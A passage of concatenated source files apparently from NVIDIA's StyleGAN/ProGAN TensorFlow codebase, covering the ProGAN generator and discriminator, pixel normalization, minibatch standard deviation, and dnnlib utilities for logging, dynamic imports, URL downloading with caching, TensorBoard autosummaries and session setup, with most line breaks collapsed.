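    n, c, h, w = x.shape  # assumes h and w are divisible by factor
    up = np.tile(x.reshape(n, c, h, 1, w, 1), (1, 1, 1, factor, 1, factor))
    up = up.reshape(n, c, h * factor, w * factor)
    down = x.reshape(n, c, h // factor, factor, w // factor, factor).mean(axis=(3, 5))
    return up, down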
def pixel_norm(x, epsilon=1e-8): with tf.variable_scope('PixelNorm'): return x * tf.rsqrt(tf.reduce_mean(tf.square(x), axis=1, keepdims=True) + epsilon) #---------------------------------------------------------------------------- # Minibatch standard deviation. def minibatch_stddev_layer(x, group_size=4, num_new_features=1): with tf.variable_scope('MinibatchStddev'): group_size = tf.minimum(group_size, tf.shape(x)[0]) # Minibatch must be divisible by (or smaller than) group_size. s = x.shape # [NCHW] Input shape. y = tf.reshape(x, [group_size, -1, num_new_features, s[1]//num_new_features, s[2], s[3]]) # [GMncHW] Split minibatch into M groups of size G. Split channels into n channel groups c. y = tf.cast(y, tf.float32) # [GMncHW] Cast to FP32. y -= tf.reduce_mean(y, axis=0, keepdims=True) # [GMncHW] Subtract mean over group. y = tf.reduce_mean(tf.square(y), axis=0) # [MncHW] Calc variance over group. y = tf.sqrt(y + 1e-8) # [MncHW] Calc stddev over group. y = tf.reduce_mean(y, axis=[2,3,4], keepdims=True) # [Mn111] Take average over fmaps and pixels. y = tf.reduce_mean(y, axis=[2]) # [Mn11] Split channels into c channel groups y = tf.cast(y, x.dtype) # [Mn11] Cast back to original data type. y = tf.tile(y, [group_size, 1, s[2], s[3]]) # [NnHW] Replicate over group and pixels. return tf.concat([x, y], axis=1) # [NCHW] Append as new fmap. #---------------------------------------------------------------------------- # Networks used in the ProgressiveGAN paper. def G_paper( latents_in, # First input: Latent vectors [minibatch, latent_size]. labels_in, # Second input: Labels [minibatch, label_size]. num_channels = 1, # Number of output color channels. Overridden based on dataset. resolution = 32, # Output resolution. Overridden based on dataset. label_size = 0, # Dimensionality of the labels, 0 if no labels. Overridden based on dataset. fmap_base = 8192, # Overall multiplier for the number of feature maps. fmap_decay = 1.0, # log2 feature map reduction when doubling the resolution. fmap_max = 512, # Maximum number of feature maps in any layer. latent_size = None, # Dimensionality of the latent vectors. None = min(fmap_base, fmap_max). normalize_latents = True, # Normalize latent vectors before feeding them to the network? use_wscale = True, # Enable equalized learning rate? use_pixelnorm = True, # Enable pixelwise feature vector normalization? pixelnorm_epsilon = 1e-8, # Constant epsilon for pixelwise feature vector normalization. use_leakyrelu = True, # True = leaky ReLU, False = ReLU. dtype = 'float32', # Data type to use for activations and outputs. fused_scale = True, # True = use fused upscale2d + conv2d, False = separate upscale2d layers. structure = None, # 'linear' = human-readable, 'recursive' = efficient, None = select automatically. is_template_graph = False, # True = template graph constructed by the Network class, False = actual evaluation. **_kwargs): # Ignore unrecognized keyword args. 
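    # Note: this is the original ProGAN generator. There is no mapping network or per-layer
    # style input; the latents (concatenated with the label vector, if any) are fed directly
    # into the 4x4 block, pixel-normalized first when normalize_latents is set, and the
    # network grows with the same linear/recursive lod structures used by the StyleGAN
    # synthesis network above.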
resolution_log2 = int(np.log2(resolution)) assert resolution == 2**resolution_log2 and resolution >= 4 def nf(stage): return min(int(fmap_base / (2.0 ** (stage * fmap_decay))), fmap_max) def PN(x): return pixel_norm(x, epsilon=pixelnorm_epsilon) if use_pixelnorm else x if latent_size is None: latent_size = nf(0) if structure is None: structure = 'linear' if is_template_graph else 'recursive' act = leaky_relu if use_leakyrelu else tf.nn.relu latents_in.set_shape([None, latent_size]) labels_in.set_shape([None, label_size]) combo_in = tf.cast(tf.concat([latents_in, labels_in], axis=1), dtype) lod_in = tf.cast(tf.get_variable('lod', initializer=np.float32(0.0), trainable=False), dtype) images_out = None # Building blocks. def block(x, res): # res = 2..resolution_log2 with tf.variable_scope('%dx%d' % (2**res, 2**res)): if res == 2: # 4x4 if normalize_latents: x = pixel_norm(x, epsilon=pixelnorm_epsilon) with tf.variable_scope('Dense'): x = dense(x, fmaps=nf(res-1)*16, gain=np.sqrt(2)/4, use_wscale=use_wscale) # override gain to match the original Theano implementation x = tf.reshape(x, [-1, nf(res-1), 4, 4]) x = PN(act(apply_bias(x))) with tf.variable_scope('Conv'): x = PN(act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, use_wscale=use_wscale)))) else: # 8x8 and up if fused_scale: with tf.variable_scope('Conv0_up'): x = PN(act(apply_bias(upscale2d_conv2d(x, fmaps=nf(res-1), kernel=3, use_wscale=use_wscale)))) else: x = upscale2d(x) with tf.variable_scope('Conv0'): x = PN(act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, use_wscale=use_wscale)))) with tf.variable_scope('Conv1'): x = PN(act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, use_wscale=use_wscale)))) return x def torgb(x, res): # res = 2..resolution_log2 lod = resolution_log2 - res with tf.variable_scope('ToRGB_lod%d' % lod): return apply_bias(conv2d(x, fmaps=num_channels, kernel=1, gain=1, use_wscale=use_wscale)) # Linear structure: simple but inefficient. if structure == 'linear': x = block(combo_in, 2) images_out = torgb(x, 2) for res in range(3, resolution_log2 + 1): lod = resolution_log2 - res x = block(x, res) img = torgb(x, res) images_out = upscale2d(images_out) with tf.variable_scope('Grow_lod%d' % lod): images_out = lerp_clip(img, images_out, lod_in - lod) # Recursive structure: complex but efficient. if structure == 'recursive': def grow(x, res, lod): y = block(x, res) img = lambda: upscale2d(torgb(y, res), 2**lod) if res > 2: img = cset(img, (lod_in > lod), lambda: upscale2d(lerp(torgb(y, res), upscale2d(torgb(x, res - 1)), lod_in - lod), 2**lod)) if lod > 0: img = cset(img, (lod_in < lod), lambda: grow(y, res + 1, lod - 1)) return img() images_out = grow(combo_in, 2, resolution_log2 - 2) assert images_out.dtype == tf.as_dtype(dtype) images_out = tf.identity(images_out, name='images_out') return images_out def D_paper( images_in, # First input: Images [minibatch, channel, height, width]. labels_in, # Second input: Labels [minibatch, label_size]. num_channels = 1, # Number of input color channels. Overridden based on dataset. resolution = 32, # Input resolution. Overridden based on dataset. label_size = 0, # Dimensionality of the labels, 0 if no labels. Overridden based on dataset. fmap_base = 8192, # Overall multiplier for the number of feature maps. fmap_decay = 1.0, # log2 feature map reduction when doubling the resolution. fmap_max = 512, # Maximum number of feature maps in any layer. use_wscale = True, # Enable equalized learning rate? 
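    # Note: the minibatch-stddev feature controlled by the next argument is only appended
    # in the final 4x4 block of the discriminator (see block() below).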
mbstd_group_size = 4, # Group size for the minibatch standard deviation layer, 0 = disable. dtype = 'float32', # Data type to use for activations and outputs. fused_scale = True, # True = use fused conv2d + downscale2d, False = separate downscale2d layers. structure = None, # 'linear' = human-readable, 'recursive' = efficient, None = select automatically is_template_graph = False, # True = template graph constructed by the Network class, False = actual evaluation. **_kwargs): # Ignore unrecognized keyword args. resolution_log2 = int(np.log2(resolution)) assert resolution == 2**resolution_log2 and resolution >= 4 def nf(stage): return min(int(fmap_base / (2.0 ** (stage * fmap_decay))), fmap_max) if structure is None: structure = 'linear' if is_template_graph else 'recursive' act = leaky_relu images_in.set_shape([None, num_channels, resolution, resolution]) labels_in.set_shape([None, label_size]) images_in = tf.cast(images_in, dtype) labels_in = tf.cast(labels_in, dtype) lod_in = tf.cast(tf.get_variable('lod', initializer=np.float32(0.0), trainable=False), dtype) scores_out = None # Building blocks. def fromrgb(x, res): # res = 2..resolution_log2 with tf.variable_scope('FromRGB_lod%d' % (resolution_log2 - res)): return act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=1, use_wscale=use_wscale))) def block(x, res): # res = 2..resolution_log2 with tf.variable_scope('%dx%d' % (2**res, 2**res)): if res >= 3: # 8x8 and up with tf.variable_scope('Conv0'): x = act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, use_wscale=use_wscale))) if fused_scale: with tf.variable_scope('Conv1_down'): x = act(apply_bias(conv2d_downscale2d(x, fmaps=nf(res-2), kernel=3, use_wscale=use_wscale))) else: with tf.variable_scope('Conv1'): x = act(apply_bias(conv2d(x, fmaps=nf(res-2), kernel=3, use_wscale=use_wscale))) x = downscale2d(x) else: # 4x4 if mbstd_group_size > 1: x = minibatch_stddev_layer(x, mbstd_group_size) with tf.variable_scope('Conv'): x = act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, use_wscale=use_wscale))) with tf.variable_scope('Dense0'): x = act(apply_bias(dense(x, fmaps=nf(res-2), use_wscale=use_wscale))) with tf.variable_scope('Dense1'): x = apply_bias(dense(x, fmaps=1, gain=1, use_wscale=use_wscale)) return x # Linear structure: simple but inefficient. if structure == 'linear': img = images_in x = fromrgb(img, resolution_log2) for res in range(resolution_log2, 2, -1): lod = resolution_log2 - res x = block(x, res) img = downscale2d(img) y = fromrgb(img, res - 1) with tf.variable_scope('Grow_lod%d' % lod): x = lerp_clip(x, y, lod_in - lod) scores_out = block(x, 2) # Recursive structure: complex but efficient. if structure == 'recursive': def grow(res, lod): x = lambda: fromrgb(downscale2d(images_in, 2**lod), res) if lod > 0: x = cset(x, (lod_in < lod), lambda: grow(res + 1, lod - 1)) x = block(x(), res); y = lambda: x if res > 2: y = cset(y, (lod_in > lod), lambda: lerp(x, fromrgb(downscale2d(images_in, 2**(lod+1)), res - 1), lod_in - lod)) return y() scores_out = grow(2, resolution_log2 - 2) assert scores_out.dtype == tf.as_dtype(dtype) scores_out = tf.identity(scores_out, name='scores_out') return scores_out #---------------------------------------------------------------------------- File: dnnlib/util.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. 
To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Miscellaneous utility classes and functions.""" import ctypes import fnmatch import importlib import inspect import numpy as np import os import shutil import sys import types import io import pickle import re import requests import html import hashlib import glob import uuid from distutils.util import strtobool from typing import Any, List, Tuple, Union # Util classes # ------------------------------------------------------------------------------------------ class EasyDict(dict): """Convenience class that behaves like a dict but allows access with the attribute syntax.""" def __getattr__(self, name: str) -> Any: try: return self[name] except KeyError: raise AttributeError(name) def __setattr__(self, name: str, value: Any) -> None: self[name] = value def __delattr__(self, name: str) -> None: del self[name] class Logger(object): """Redirect stderr to stdout, optionally print stdout to a file, and optionally force flushing on both stdout and the file.""" def __init__(self, file_name: str = None, file_mode: str = "w", should_flush: bool = True): self.file = None if file_name is not None: self.file = open(file_name, file_mode) self.should_flush = should_flush self.stdout = sys.stdout self.stderr = sys.stderr sys.stdout = self sys.stderr = self def __enter__(self) -> "Logger": return self def __exit__(self, exc_type: Any, exc_value: Any, traceback: Any) -> None: self.close() def write(self, text: str) -> None: """Write text to stdout (and a file) and optionally flush.""" if len(text) == 0: # workaround for a bug in VSCode debugger: sys.stdout.write(''); sys.stdout.flush() => crash return if self.file is not None: self.file.write(text) self.stdout.write(text) if self.should_flush: self.flush() def flush(self) -> None: """Flush written text to both stdout and a file, if open.""" if self.file is not None: self.file.flush() self.stdout.flush() def close(self) -> None: """Flush, close possible files, and remove stdout/stderr mirroring.""" self.flush() # if using multiple loggers, prevent closing in wrong order if sys.stdout is self: sys.stdout = self.stdout if sys.stderr is self: sys.stderr = self.stderr if self.file is not None: self.file.close() # Small util functions # ------------------------------------------------------------------------------------------ def format_time(seconds: Union[int, float]) -> str: """Convert the seconds to human readable string with days, hours, minutes and seconds.""" s = int(np.rint(seconds)) if s < 60: return "{0}s".format(s) elif s < 60 * 60: return "{0}m {1:02}s".format(s // 60, s % 60) elif s < 24 * 60 * 60: return "{0}h {1:02}m {2:02}s".format(s // (60 * 60), (s // 60) % 60, s % 60) else: return "{0}d {1:02}h {2:02}m".format(s // (24 * 60 * 60), (s // (60 * 60)) % 24, (s // 60) % 60) def ask_yes_no(question: str) -> bool: """Ask the user the question until the user inputs a valid answer.""" while True: try: print("{0} [y/n]".format(question)) return strtobool(input().lower()) except ValueError: pass def tuple_product(t: Tuple) -> Any: """Calculate the product of the tuple elements.""" result = 1 for v in t: result *= v return result _str_to_ctype = { "uint8": ctypes.c_ubyte, "uint16": ctypes.c_uint16, "uint32": ctypes.c_uint32, "uint64": ctypes.c_uint64, "int8": ctypes.c_byte, "int16": ctypes.c_int16, "int32": ctypes.c_int32, "int64": ctypes.c_int64, "float32": ctypes.c_float, "float64": 
ctypes.c_double } def get_dtype_and_ctype(type_obj: Any) -> Tuple[np.dtype, Any]: """Given a type name string (or an object having a __name__ attribute), return matching Numpy and ctypes types that have the same size in bytes.""" type_str = None if isinstance(type_obj, str): type_str = type_obj elif hasattr(type_obj, "__name__"): type_str = type_obj.__name__ elif hasattr(type_obj, "name"): type_str = type_obj.name else: raise RuntimeError("Cannot infer type name from input") assert type_str in _str_to_ctype.keys() my_dtype = np.dtype(type_str) my_ctype = _str_to_ctype[type_str] assert my_dtype.itemsize == ctypes.sizeof(my_ctype) return my_dtype, my_ctype def is_pickleable(obj: Any) -> bool: try: with io.BytesIO() as stream: pickle.dump(obj, stream) return True except: return False # Functionality to import modules/objects by name, and call functions by name # ------------------------------------------------------------------------------------------ def get_module_from_obj_name(obj_name: str) -> Tuple[types.ModuleType, str]: """Searches for the underlying module behind the name to some python object. Returns the module and the object name (original name with module part removed).""" # allow convenience shorthands, substitute them by full names obj_name = re.sub("^np.", "numpy.", obj_name) obj_name = re.sub("^tf.", "tensorflow.", obj_name) # list alternatives for (module_name, local_obj_name) parts = obj_name.split(".") name_pairs = [(".".join(parts[:i]), ".".join(parts[i:])) for i in range(len(parts), 0, -1)] # try each alternative in turn for module_name, local_obj_name in name_pairs: try: module = importlib.import_module(module_name) # may raise ImportError get_obj_from_module(module, local_obj_name) # may raise AttributeError return module, local_obj_name except: pass # maybe some of the modules themselves contain errors? for module_name, _local_obj_name in name_pairs: try: importlib.import_module(module_name) # may raise ImportError except ImportError: if not str(sys.exc_info()[1]).startswith("No module named '" + module_name + "'"): raise # maybe the requested attribute is missing? 
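    # Retry each candidate (module, attribute) pair, this time catching only ImportError,
    # so that a genuine AttributeError from the attribute lookup propagates with its
    # original message instead of being swallowed by the blanket except above.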
for module_name, local_obj_name in name_pairs: try: module = importlib.import_module(module_name) # may raise ImportError get_obj_from_module(module, local_obj_name) # may raise AttributeError except ImportError: pass # we are out of luck, but we have no idea why raise ImportError(obj_name) def get_obj_from_module(module: types.ModuleType, obj_name: str) -> Any: """Traverses the object name and returns the last (rightmost) python object.""" if obj_name == '': return module obj = module for part in obj_name.split("."): obj = getattr(obj, part) return obj def get_obj_by_name(name: str) -> Any: """Finds the python object with the given name.""" module, obj_name = get_module_from_obj_name(name) return get_obj_from_module(module, obj_name) def call_func_by_name(*args, func_name: str = None, **kwargs) -> Any: """Finds the python object with the given name and calls it as a function.""" assert func_name is not None func_obj = get_obj_by_name(func_name) assert callable(func_obj) return func_obj(*args, **kwargs) def get_module_dir_by_obj_name(obj_name: str) -> str: """Get the directory path of the module containing the given object name.""" module, _ = get_module_from_obj_name(obj_name) return os.path.dirname(inspect.getfile(module)) def is_top_level_function(obj: Any) -> bool: """Determine whether the given object is a top-level function, i.e., defined at module scope using 'def'.""" return callable(obj) and obj.__name__ in sys.modules[obj.__module__].__dict__ def get_top_level_function_name(obj: Any) -> str: """Return the fully-qualified name of a top-level function.""" assert is_top_level_function(obj) return obj.__module__ + "." + obj.__name__ # File system helpers # ------------------------------------------------------------------------------------------ def list_dir_recursively_with_ignore(dir_path: str, ignores: List[str] = None, add_base_to_relative: bool = False) -> List[Tuple[str, str]]: """List all files recursively in a given directory while ignoring given file and directory names. Returns list of tuples containing both absolute and relative paths.""" assert os.path.isdir(dir_path) base_name = os.path.basename(os.path.normpath(dir_path)) if ignores is None: ignores = [] result = [] for root, dirs, files in os.walk(dir_path, topdown=True): for ignore_ in ignores: dirs_to_remove = [d for d in dirs if fnmatch.fnmatch(d, ignore_)] # dirs need to be edited in-place for d in dirs_to_remove: dirs.remove(d) files = [f for f in files if not fnmatch.fnmatch(f, ignore_)] absolute_paths = [os.path.join(root, f) for f in files] relative_paths = [os.path.relpath(p, dir_path) for p in absolute_paths] if add_base_to_relative: relative_paths = [os.path.join(base_name, p) for p in relative_paths] assert len(absolute_paths) == len(relative_paths) result += zip(absolute_paths, relative_paths) return result def copy_files_and_create_dirs(files: List[Tuple[str, str]]) -> None: """Takes in a list of tuples of (src, dst) paths and copies files. 
Will create all necessary directories.""" for file in files: target_dir_name = os.path.dirname(file[1]) # will create all intermediate-level directories if not os.path.exists(target_dir_name): os.makedirs(target_dir_name) shutil.copyfile(file[0], file[1]) # URL helpers # ------------------------------------------------------------------------------------------ def is_url(obj: Any) -> bool: """Determine whether the given object is a valid URL string.""" if not isinstance(obj, str) or not "://" in obj: return False try: res = requests.compat.urlparse(obj) if not res.scheme or not res.netloc or not "." in res.netloc: return False res = requests.compat.urlparse(requests.compat.urljoin(obj, "/")) if not res.scheme or not res.netloc or not "." in res.netloc: return False except: return False return True def open_url(url: str, cache_dir: str = None, num_attempts: int = 10, verbose: bool = True) -> Any: """Download the given URL and return a binary-mode file object to access the data.""" assert is_url(url) assert num_attempts >= 1 # Lookup from cache. url_md5 = hashlib.md5(url.encode("utf-8")).hexdigest() if cache_dir is not None: cache_files = glob.glob(os.path.join(cache_dir, url_md5 + "_*")) if len(cache_files) == 1: return open(cache_files[0], "rb") # Download. url_name = None url_data = None with requests.Session() as session: if verbose: print("Downloading %s ..." % url, end="", flush=True) for attempts_left in reversed(range(num_attempts)): try: with session.get(url) as res: res.raise_for_status() if len(res.content) == 0: raise IOError("No data received") if len(res.content) < 8192: content_str = res.content.decode("utf-8") if "download_warning" in res.headers.get("Set-Cookie", ""): links = [html.unescape(link) for link in content_str.split('"') if "export=download" in link] if len(links) == 1: url = requests.compat.urljoin(url, links[0]) raise IOError("Google Drive virus checker nag") if "Google Drive - Quota exceeded" in content_str: raise IOError("Google Drive quota exceeded") match = re.search(r'filename="([^"]*)"', res.headers.get("Content-Disposition", "")) url_name = match[1] if match else url url_data = res.content if verbose: print(" done") break except: if not attempts_left: if verbose: print(" failed") raise if verbose: print(".", end="", flush=True) # Save to cache. if cache_dir is not None: safe_name = re.sub(r"[^0-9a-zA-Z-._]", "_", url_name) cache_file = os.path.join(cache_dir, url_md5 + "_" + safe_name) temp_file = os.path.join(cache_dir, "tmp_" + uuid.uuid4().hex + "_" + url_md5 + "_" + safe_name) os.makedirs(cache_dir, exist_ok=True) with open(temp_file, "wb") as f: f.write(url_data) os.replace(temp_file, cache_file) # atomic # Return data as file object. return io.BytesIO(url_data) File: dnnlib/__init__.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. from . 
import submission from .submission.run_context import RunContext from .submission.submit import SubmitTarget from .submission.submit import PathType from .submission.submit import SubmitConfig from .submission.submit import get_path_from_template from .submission.submit import submit_run from .util import EasyDict submit_config: SubmitConfig = None # Package level variable for SubmitConfig which is only valid when inside the run function. File: dnnlib/tflib/__init__.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. from . import autosummary from . import network from . import optimizer from . import tfutil from .tfutil import * from .network import Network from .optimizer import Optimizer File: dnnlib/tflib/autosummary.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Helper for adding automatically tracked values to Tensorboard. Autosummary creates an identity op that internally keeps track of the input values and automatically shows up in TensorBoard. The reported value represents an average over input components. The average is accumulated constantly over time and flushed when save_summaries() is called. Notes: - The output tensor must be used as an input for something else in the graph. Otherwise, the autosummary op will not get executed, and the average value will not get accumulated. - It is perfectly fine to include autosummaries with the same name in several places throughout the graph, even if they are executed concurrently. - It is ok to also pass in a python scalar or numpy array. In this case, it is added to the average immediately. """ from collections import OrderedDict import numpy as np import tensorflow as tf from tensorboard import summary as summary_lib from tensorboard.plugins.custom_scalar import layout_pb2 from . import tfutil from .tfutil import TfExpression from .tfutil import TfExpressionEx _dtype = tf.float64 _vars = OrderedDict() # name => [var, ...] 
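# Typical usage (sketch; names are illustrative): wrap a value so it is tracked in
# TensorBoard, make sure the returned tensor is actually consumed by the graph, and
# flush the accumulated averages periodically from the training loop:
#
#     loss = autosummary('Loss/total', loss)
#     ...
#     save_summaries(file_writer, global_step)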
_immediate = OrderedDict() # name => update_op, update_value _finalized = False _merge_op = None def _create_var(name: str, value_expr: TfExpression) -> TfExpression: """Internal helper for creating autosummary accumulators.""" assert not _finalized name_id = name.replace("/", "_") v = tf.cast(value_expr, _dtype) if v.shape.is_fully_defined(): size = np.prod(tfutil.shape_to_list(v.shape)) size_expr = tf.constant(size, dtype=_dtype) else: size = None size_expr = tf.reduce_prod(tf.cast(tf.shape(v), _dtype)) if size == 1: if v.shape.ndims != 0: v = tf.reshape(v, []) v = [size_expr, v, tf.square(v)] else: v = [size_expr, tf.reduce_sum(v), tf.reduce_sum(tf.square(v))] v = tf.cond(tf.is_finite(v[1]), lambda: tf.stack(v), lambda: tf.zeros(3, dtype=_dtype)) with tfutil.absolute_name_scope("Autosummary/" + name_id), tf.control_dependencies(None): var = tf.Variable(tf.zeros(3, dtype=_dtype), trainable=False) # [sum(1), sum(x), sum(x**2)] update_op = tf.cond(tf.is_variable_initialized(var), lambda: tf.assign_add(var, v), lambda: tf.assign(var, v)) if name in _vars: _vars[name].append(var) else: _vars[name] = [var] return update_op def autosummary(name: str, value: TfExpressionEx, passthru: TfExpressionEx = None) -> TfExpressionEx: """Create a new autosummary. Args: name: Name to use in TensorBoard value: TensorFlow expression or python value to track passthru: Optionally return this TF node without modifications but tack an autosummary update side-effect to this node. Example use of the passthru mechanism: n = autosummary('l2loss', loss, passthru=n) This is a shorthand for the following code: with tf.control_dependencies([autosummary('l2loss', loss)]): n = tf.identity(n) """ tfutil.assert_tf_initialized() name_id = name.replace("/", "_") if tfutil.is_tf_expression(value): with tf.name_scope("summary_" + name_id), tf.device(value.device): update_op = _create_var(name, value) with tf.control_dependencies([update_op]): return tf.identity(value if passthru is None else passthru) else: # python scalar or numpy array if name not in _immediate: with tfutil.absolute_name_scope("Autosummary/" + name_id), tf.device(None), tf.control_dependencies(None): update_value = tf.placeholder(_dtype) update_op = _create_var(name, update_value) _immediate[name] = update_op, update_value update_op, update_value = _immediate[name] tfutil.run(update_op, {update_value: value}) return value if passthru is None else passthru def finalize_autosummaries() -> None: """Create the necessary ops to include autosummaries in TensorBoard report. Note: This should be done only once per graph. """ global _finalized tfutil.assert_tf_initialized() if _finalized: return None _finalized = True tfutil.init_uninitialized_vars([var for vars_list in _vars.values() for var in vars_list]) # Create summary ops. with tf.device(None), tf.control_dependencies(None): for name, vars_list in _vars.items(): name_id = name.replace("/", "_") with tfutil.absolute_name_scope("Autosummary/" + name_id): moments = tf.add_n(vars_list) moments /= moments[0] with tf.control_dependencies([moments]): # read before resetting reset_ops = [tf.assign(var, tf.zeros(3, dtype=_dtype)) for var in vars_list] with tf.name_scope(None), tf.control_dependencies(reset_ops): # reset before reporting mean = moments[1] std = tf.sqrt(moments[2] - tf.square(moments[1])) tf.summary.scalar(name, mean) tf.summary.scalar("xCustomScalars/" + name + "/margin_lo", mean - std) tf.summary.scalar("xCustomScalars/" + name + "/margin_hi", mean + std) # Group by category and chart name. 
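    # Series names of the form "category/chart/..." are bucketed into an ordered
    # category -> chart -> [series] mapping, which is then converted into a TensorBoard
    # custom_scalar layout of margin charts (mean +/- std) below.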
cat_dict = OrderedDict() for series_name in sorted(_vars.keys()): p = series_name.split("/") cat = p[0] if len(p) >= 2 else "" chart = "/".join(p[1:-1]) if len(p) >= 3 else p[-1] if cat not in cat_dict: cat_dict[cat] = OrderedDict() if chart not in cat_dict[cat]: cat_dict[cat][chart] = [] cat_dict[cat][chart].append(series_name) # Setup custom_scalar layout. categories = [] for cat_name, chart_dict in cat_dict.items(): charts = [] for chart_name, series_names in chart_dict.items(): series = [] for series_name in series_names: series.append(layout_pb2.MarginChartContent.Series( value=series_name, lower="xCustomScalars/" + series_name + "/margin_lo", upper="xCustomScalars/" + series_name + "/margin_hi")) margin = layout_pb2.MarginChartContent(series=series) charts.append(layout_pb2.Chart(title=chart_name, margin=margin)) categories.append(layout_pb2.Category(title=cat_name, chart=charts)) layout = summary_lib.custom_scalar_pb(layout_pb2.Layout(category=categories)) return layout def save_summaries(file_writer, global_step=None): """Call FileWriter.add_summary() with all summaries in the default graph, automatically finalizing and merging them on the first call. """ global _merge_op tfutil.assert_tf_initialized() if _merge_op is None: layout = finalize_autosummaries() if layout is not None: file_writer.add_summary(layout) with tf.device(None), tf.control_dependencies(None): _merge_op = tf.summary.merge_all() file_writer.add_summary(_merge_op.eval(), global_step) File: dnnlib/tflib/tfutil.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. 
"""Miscellaneous helper utils for Tensorflow.""" import os import numpy as np import tensorflow as tf from typing import Any, Iterable, List, Union TfExpression = Union[tf.Tensor, tf.Variable, tf.Operation] """A type that represents a valid Tensorflow expression.""" TfExpressionEx = Union[TfExpression, int, float, np.ndarray] """A type that can be converted to a valid Tensorflow expression.""" def run(*args, **kwargs) -> Any: """Run the specified ops in the default session.""" assert_tf_initialized() return tf.get_default_session().run(*args, **kwargs) def is_tf_expression(x: Any) -> bool: """Check whether the input is a valid Tensorflow expression, i.e., Tensorflow Tensor, Variable, or Operation.""" return isinstance(x, (tf.Tensor, tf.Variable, tf.Operation)) def shape_to_list(shape: Iterable[tf.Dimension]) -> List[Union[int, None]]: """Convert a Tensorflow shape to a list of ints.""" return [dim.value for dim in shape] def flatten(x: TfExpressionEx) -> TfExpression: """Shortcut function for flattening a tensor.""" with tf.name_scope("Flatten"): return tf.reshape(x, [-1]) def log2(x: TfExpressionEx) -> TfExpression: """Logarithm in base 2.""" with tf.name_scope("Log2"): return tf.log(x) * np.float32(1.0 / np.log(2.0)) def exp2(x: TfExpressionEx) -> TfExpression: """Exponent in base 2.""" with tf.name_scope("Exp2"): return tf.exp(x * np.float32(np.log(2.0))) def lerp(a: TfExpressionEx, b: TfExpressionEx, t: TfExpressionEx) -> TfExpressionEx: """Linear interpolation.""" with tf.name_scope("Lerp"): return a + (b - a) * t def lerp_clip(a: TfExpressionEx, b: TfExpressionEx, t: TfExpressionEx) -> TfExpression: """Linear interpolation with clip.""" with tf.name_scope("LerpClip"): return a + (b - a) * tf.clip_by_value(t, 0.0, 1.0) def absolute_name_scope(scope: str) -> tf.name_scope: """Forcefully enter the specified name scope, ignoring any surrounding scopes.""" return tf.name_scope(scope + "/") def absolute_variable_scope(scope: str, **kwargs) -> tf.variable_scope: """Forcefully enter the specified variable scope, ignoring any surrounding scopes.""" return tf.variable_scope(tf.VariableScope(name=scope, **kwargs), auxiliary_name_scope=False) def _sanitize_tf_config(config_dict: dict = None) -> dict: # Defaults. cfg = dict() cfg["rnd.np_random_seed"] = None # Random seed for NumPy. None = keep as is. cfg["rnd.tf_random_seed"] = "auto" # Random seed for TensorFlow. 'auto' = derive from NumPy random state. None = keep as is. cfg["env.TF_CPP_MIN_LOG_LEVEL"] = "1" # 0 = Print all available debug info from TensorFlow. 1 = Print warnings and errors, but disable debug info. cfg["graph_options.place_pruned_graph"] = True # False = Check that all ops are available on the designated device. True = Skip the check for ops that are not used. cfg["gpu_options.allow_growth"] = True # False = Allocate all GPU memory at the beginning. True = Allocate only as much GPU memory as needed. # User overrides. if config_dict is not None: cfg.update(config_dict) return cfg def init_tf(config_dict: dict = None) -> None: """Initialize TensorFlow session using good default settings.""" # Skip if already initialized. if tf.get_default_session() is not None: return # Setup config dict and random seeds. 
cfg = _sanitize_tf_config(config_dict) np_random_seed = cfg["rnd.np_random_seed"] if np_random_seed is not None: np.random.seed(np_random_seed) tf_random_seed = cfg["rnd.tf_random_seed"] if tf_random_seed == "auto": tf_random_seed = np.random.randint(1 << 31) if tf_random_seed is not None: tf.set_random_seed(tf_random_seed) # Setup environment variables. for key, value in list(cfg.items()): fields = key.split(".") if fields[0] == "env": assert len(fields) == 2 os.environ[fields[1]] = str(value) # Create default TensorFlow session. create_session(cfg, force_as_default=True) def assert_tf_initialized(): """Check that TensorFlow session has been initialized.""" if tf.get_default_session() is None: raise RuntimeError("No default TensorFlow session found. Please call dnnlib.tflib.init_tf().") def create_session(config_dict: dict = None, force_as_default: bool = False) -> tf.Session: """Create tf.Session based on config dict.""" # Setup TensorFlow config proto. cfg = _sanitize_tf_config(config_dict) config_proto = tf.ConfigProto() for key, value in cfg.items(): fields = key.split(".") if fields[0] not in ["rnd", "env"]: obj = config_proto for field in fields[:-1]: obj = getattr(obj, field) setattr(obj, fields[-1], value) # Create session. session = tf.Session(config=config_proto) if force_as_default: # pylint: disable=protected-access session._default_session = session.as_default() session._default_session.enforce_nesting = False session._default_session.__enter__() # pylint: disable=no-member return session def init_uninitialized_vars(target_vars: List[tf.Variable] = None) -> None: """Initialize all tf.Variables that have not already been initialized. Equivalent to the following, but more efficient and does not bloat the tf graph: tf.variables_initializer(tf.report_uninitialized_variables()).run() """ 